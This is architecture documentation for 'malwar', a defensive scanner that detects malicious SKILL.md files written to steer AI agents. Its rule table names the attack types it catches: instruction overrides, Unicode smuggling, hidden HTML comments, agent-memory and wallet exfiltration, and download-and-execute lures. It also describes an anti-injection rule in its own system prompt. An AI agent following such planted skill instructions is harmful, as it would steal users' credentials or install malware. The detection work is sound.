malwar Architecture¶
Overview¶
malwar is a 4-layer malware detection engine purpose-built for scanning agentic skills -- specifically SKILL.md files used in the OpenClaw/ClawHub ecosystem. Unlike traditional malware scanners that analyze binary executables or source code, malwar detects threats embedded in natural language markdown instructions that direct AI agents to perform malicious actions.
The threat landscape is significant: approximately 20% of ClawHub's 10,700+ published skills are confirmed malicious. The ClawHavoc campaign alone accounts for 824+ malicious skills delivering the AMOS infostealer. Existing security tools (VirusTotal, Cisco Skill Scanner, SecureClaw, Snyk ToxicSkills) all fail at natural language threat detection because attacks are markdown instructions, not code.
System Architecture Diagram¶
+------------------+
| Entry Points |
+------------------+
| CLI | API |
| typer | FastAPI |
+---+-------+------+
| |
v v
+--------------------------+
| SKILL.md Parser |
| (frontmatter + markdown) |
+------------+-------------+
|
v
+---------------------------+
| Scan Pipeline |
| (ScanPipeline) |
+---------------------------+
| |
| +---------------------+ |
| | Layer 1 (order=10) | |
| | Rule Engine | |
| | Pattern matching | |
| +--------+------------+ |
| | |
| v |
| +---------------------+ |
| | Layer 2 (order=20) | |
| | URL Crawler | |
| | Fetch & analyze URLs| |
| +--------+------------+ |
| | |
| v |
| +---------------------+ |
| | Layer 3 (order=30) | |
| | LLM Analyzer | |
| | Semantic analysis | |
| +--------+------------+ |
| | |
| v |
| +---------------------+ |
| | Layer 4 (order=40) | |
| | Threat Intel | |
| | IOC correlation | |
| +--------+------------+ |
| | |
+---------------------------+
|
v
+---------------------------+
| ScanResult |
| verdict / risk_score / |
| findings / severity |
+---------------------------+
| |
v v
+---------+ +---------+
| SQLite | | Output |
| DB | | Console |
| | | JSON |
| | | SARIF |
+---------+ +---------+
Core Components¶
Entry Points¶
malwar provides two interfaces for users:
-
CLI (
malwar.cli.app) -- A Typer-based command-line interface for scanning files, managing the database, listing signatures, and starting the API server. -
REST API (
malwar.api.app) -- A FastAPI web server with endpoints for scanning, retrieving results, managing threat signatures, viewing campaigns, and generating reports. Includes a React frontend served fromweb/dist/in production mode.
SKILL.md Parser¶
The parser (malwar.parsers.skill_parser) transforms raw SKILL.md content into a structured SkillContent object:
-
Frontmatter Extraction -- Uses the
python-frontmatterlibrary to parse YAML frontmatter intoSkillMetadata(name, author, description, tags, tools, source_url, author_url, version, icon). -
Markdown Body Parsing (
malwar.parsers.markdown_parser) -- Extracts: - URLs -- Both markdown links
[text](url)and barehttps://URLs - Code Blocks -- Fenced code blocks with language, content, and line numbers
-
Sections -- Heading-delimited sections with level, content, and line ranges
-
Content Hashing -- Computes SHA-256 hash of the raw content for deduplication and tracking.
ScanContext¶
The ScanContext dataclass (malwar.scanner.context) is the mutable state object that flows through the pipeline:
ScanContext
+-- skill: SkillContent # Parsed skill content
+-- scan_id: str # Unique scan identifier
+-- findings: list[Finding] # Accumulated findings from all layers
+-- url_analysis_results: dict # URL crawler enrichment data
+-- llm_analysis: dict # LLM analyzer enrichment data
+-- matched_campaigns: list[str] # Campaigns matched by threat intel
+-- errors: list[str] # Non-fatal errors from any layer
+-- metadata: dict # Arbitrary enrichment metadata
Each layer reads the context to access previous layers' findings and enrichments, then adds its own findings to the shared list via context.add_findings().
The context also computes a running current_risk_score property used for cost-control decisions (e.g., skipping expensive LLM analysis when early layers found nothing suspicious).
The 4-Layer Detection Pipeline¶
Pipeline Orchestration¶
The ScanPipeline class (malwar.scanner.pipeline) orchestrates the 4 detection layers sequentially. Detectors are registered with the pipeline and sorted by their order property.
Execution flow:
1. Create ScanContext with parsed SkillContent
2. Create ScanResult (status=RUNNING)
3. For each registered detector (sorted by order):
a. Check if layer is in the allowed layers list
b. Check cost-control skip conditions
c. Run detector.detect(context) -> list[Finding]
d. Add findings to context
e. Record layer in result.layers_executed
4. Compute final risk_score, verdict, severity
5. Return ScanResult (status=COMPLETED)
Layer selection: The layers parameter allows callers to specify which layers to run. If omitted, all registered layers execute.
Error isolation: If a detector raises an exception, the error is logged and recorded in context.errors and result.errors, but the pipeline continues to the next layer.
Layer 1: Rule Engine (order=10)¶
Module: malwar.detectors.rule_engine
The rule engine performs fast, deterministic pattern matching against the skill content. It is always the first layer to run and produces the initial risk signal.
Architecture:
BaseRule-- Abstract base class defining the rule interface (check(skill) -> list[Finding])RuleRegistry-- Central registry using a@ruledecorator for auto-registrationRuleEngineDetector-- TheBaseDetectorimplementation that iterates all enabled rules
Rule categories:
| Category | Rules | What it Detects |
|---|---|---|
| Obfuscation | MALWAR-OBF-001 to OBF-003 | Base64 commands, hex payloads, raw IP in commands |
| Prompt Injection | MALWAR-PI-001 to PI-003 | Instruction overrides, Unicode smuggling, hidden HTML comments |
| Credential Exposure | MALWAR-CRED-001 to CRED-002 | Hardcoded secrets, credential harvesting instructions |
| Data Exfiltration | MALWAR-EXFIL-001 to EXFIL-003 | Agent memory access, curl POST exfil, crypto wallet access |
| Known Malware | MALWAR-MAL-001 | ClawHavoc C2 IPs, domains, repos, known authors |
| Social Engineering | MALWAR-SE-001 to SE-003 | ClickFix fake prerequisites, suspicious downloads, typosquatting |
| Suspicious Commands | MALWAR-CMD-001 to CMD-004 | Piped execution, npx -y, password archives, download-and-execute |
Layer 2: URL Crawler (order=20)¶
Module: malwar.detectors.url_crawler
The URL crawler extracts, evaluates, fetches, and analyzes all URLs found in the skill content. It operates in 5 steps:
Step 1: Extract URLs
| (extractor.py: markdown links, bare URLs, frontmatter URLs, code blocks)
v
Step 2: Check Domain Reputation
| (reputation.py: known-malicious=0.0, IP=0.2, paste-site=0.3, safe=1.0, unknown=0.5)
v
Step 3: Fetch Suspicious URLs (reputation <= 0.6)
| (fetcher.py: HEAD pre-check, concurrent GET with safety bounds)
v
Step 4: Analyze Fetched Content
| (analyzer.py: redirect chains, content-type mismatch, shell/PS scripts, binaries, malware patterns)
v
Step 5: Store Enrichment in Context
Safety bounds: The SafeFetcher class enforces configurable limits:
- Maximum URLs per batch (default: 10)
- Per-request timeout (default: 5s)
- Maximum redirects (default: 3)
- Maximum response body size (default: 1 MB)
- Concurrency limit (default: 5)
Known-safe domains are never fetched (score=1.0): github.com, docs.python.org, pypi.org, npmjs.com, developer.mozilla.org, stackoverflow.com, wikipedia.org, docs.anthropic.com, openai.com, google.com.
Layer 3: LLM Analyzer (order=30)¶
Module: malwar.detectors.llm_analyzer
The LLM analyzer sends the full skill content to Claude (via the Anthropic API) for semantic threat analysis. This layer detects attacks that rules cannot catch -- social engineering, deceptive intent, and sophisticated prompt injection.
Cost control: The LLM layer is skipped when the current risk score from earlier layers is below the llm_skip_below_risk threshold (default: 15). This means benign-looking skills avoid the API call entirely.
Prompt structure:
-
System prompt -- Instructs Claude to act as a cybersecurity analyst. Includes critical anti-prompt-injection safeguards telling Claude to treat all skill content as data, never as instructions.
-
User prompt -- Contains:
- Skill metadata (name, author, tags, tools)
- Summary of prior findings from layers 1 and 2
-
Full SKILL.md content
-
Response format -- Structured JSON with
threat_assessment,confidence,findings[], andsummary.
Response parsing (parser.py):
- Handles raw JSON, JSON in markdown fences, trailing text
- Maps LLM categories to ThreatCategory enum values
- Maps LLM severity strings to Severity enum values
- Resolves line_hint strings to actual line numbers in the source
Layer 4: Threat Intelligence (order=40)¶
Module: malwar.detectors.threat_intel
The threat intelligence layer correlates IOCs (Indicators of Compromise) extracted from all previous layers against a known threat signature database.
IOC extraction sources:
- ioc_values and evidence from all prior findings
- Skill metadata: author, source_url, author_url
- Extracted URLs from the skill
- Full raw content (for substring matching)
Signature matching: - Exact match -- Substring search of the pattern value in any IOC - Regex match -- Compiled regex pattern searched across all IOCs
Campaign attribution: When a signature matches, the associated campaign is recorded in context.matched_campaigns. This enables campaign-level tracking and reporting.
Hardcoded fallback signatures: When no database signatures are available, the matcher falls back to hardcoded ClawHavoc signatures (C2 IP, Glot snippet, payload domain, known author).
Scoring and Verdict System¶
Risk Score Calculation¶
Risk score is computed as a weighted sum of all findings, capped at 100:
Severity weights:
| Severity | Weight |
|---|---|
| CRITICAL | 100 |
| HIGH | 75 |
| MEDIUM | 50 |
| LOW | 25 |
| INFO | 0 |
A single CRITICAL finding with confidence 0.95 produces a risk score of 95. A single HIGH finding with confidence 0.85 produces 63.
Verdict Mapping¶
| Risk Score Range | Verdict |
|---|---|
| 75 -- 100 | MALICIOUS |
| 40 -- 74 | SUSPICIOUS |
| 15 -- 39 | CAUTION |
| 0 -- 14 | CLEAN |
Overall Severity¶
The overall_severity of a scan is the highest severity among all findings. If no findings exist, it defaults to info.
Data Flow¶
SKILL.md file/content
|
v
parse_skill_content() / parse_skill_file()
|
v
SkillContent (metadata + body + code_blocks + URLs + sections + SHA-256)
|
v
ScanPipeline.scan(skill, layers)
|
+---> ScanContext created
|
+---> Layer 1: RuleEngine --> findings added to context
|
+---> Layer 2: URLCrawler --> findings + url_analysis_results added
|
+---> Layer 3: LLMAnalyzer --> findings + llm_analysis added
| (skipped if risk < threshold)
|
+---> Layer 4: ThreatIntel --> findings + matched_campaigns added
|
v
ScanResult
+-- scan_id, target, status
+-- risk_score (computed property)
+-- verdict (computed property: MALICIOUS/SUSPICIOUS/CAUTION/CLEAN)
+-- overall_severity (computed property)
+-- findings[] (all findings from all layers)
+-- layers_executed[]
+-- errors[]
+-- duration_ms
Storage Layer¶
malwar uses SQLite with WAL mode via aiosqlite for persistence.
Database tables:
| Table | Purpose |
|---|---|
scans |
Scan results with verdict, risk score, timing |
findings |
Individual threat findings linked to scans (FK cascade) |
signatures |
Threat intelligence signatures for IOC matching |
campaigns |
Tracked malware campaigns with IOCs and attribution |
publishers |
Author/publisher reputation tracking |
url_analysis |
URL fetch results linked to scans |
Indexes are created on scans (target, sha256, verdict, created_at) and findings (scan_id, rule_id, severity, category) for query performance.
Migrations run automatically on database initialization using CREATE TABLE IF NOT EXISTS and INSERT OR IGNORE for idempotent schema and seed data creation.
Notification System¶
The webhook notifier (malwar.notifications.webhook) dispatches JSON payloads to configured webhook URLs when a scan produces a MALICIOUS or SUSPICIOUS verdict. Webhooks are fire-and-forget: failures are logged but never block the scan pipeline.
Webhook payload:
{
"scan_id": "abc123",
"verdict": "MALICIOUS",
"risk_score": 95,
"finding_count": 7,
"skill_name": "Suspicious Tool",
"top_findings": [
{
"rule_id": "MALWAR-CMD-001",
"title": "Remote script piped to shell",
"severity": "critical",
"confidence": 0.92,
"category": "suspicious_command"
}
]
}
Frontend¶
malwar includes a React + TypeScript frontend (in web/) built with Vite. In production, the compiled frontend assets are served by FastAPI from web/dist/. In development, the Vite dev server runs on port 3000 with CORS configured to proxy API calls to the FastAPI backend on port 8000.
Output Formats¶
malwar supports three output formats for scan results:
-
Console -- Rich-formatted terminal output with color-coded severity, verdict banners, and finding details.
-
JSON -- Full Pydantic model serialization of
ScanResult. -
SARIF 2.1.0 -- Static Analysis Results Interchange Format for integration with GitHub Code Scanning, VS Code, and other SARIF-compatible tools. Severity is mapped: CRITICAL/HIGH to
error, MEDIUM towarning, LOW/INFO tonote.
Configuration¶
All settings are managed via environment variables with the MALWAR_ prefix, loaded from .env files using Pydantic Settings. Key configuration areas:
- Database --
MALWAR_DB_PATH - API Server --
MALWAR_API_HOST,MALWAR_API_PORT,MALWAR_API_WORKERS - Authentication --
MALWAR_API_KEYS(comma-separated) - LLM --
MALWAR_ANTHROPIC_API_KEY,MALWAR_LLM_MODEL,MALWAR_LLM_SKIP_BELOW_RISK - URL Crawler --
MALWAR_CRAWLER_MAX_URLS,MALWAR_CRAWLER_TIMEOUT,MALWAR_CRAWLER_CONCURRENCY - Rate Limiting --
MALWAR_RATE_LIMIT_RPM - Logging --
MALWAR_LOG_LEVEL,MALWAR_LOG_FORMAT - Webhooks --
MALWAR_WEBHOOK_URLS(comma-separated)